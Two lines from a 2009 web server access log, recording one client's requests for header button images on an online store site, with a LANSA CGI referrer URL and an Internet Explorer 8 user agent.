71.166.106.13 - - [23/Sep/2009:07:52:49 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.166.106.13 - - [23/Sep/2009:07:52:49 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):02+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
